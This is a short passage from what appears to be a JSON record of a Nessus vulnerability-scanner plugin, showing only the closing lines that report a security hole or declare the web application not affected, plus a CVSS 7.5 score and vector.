report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}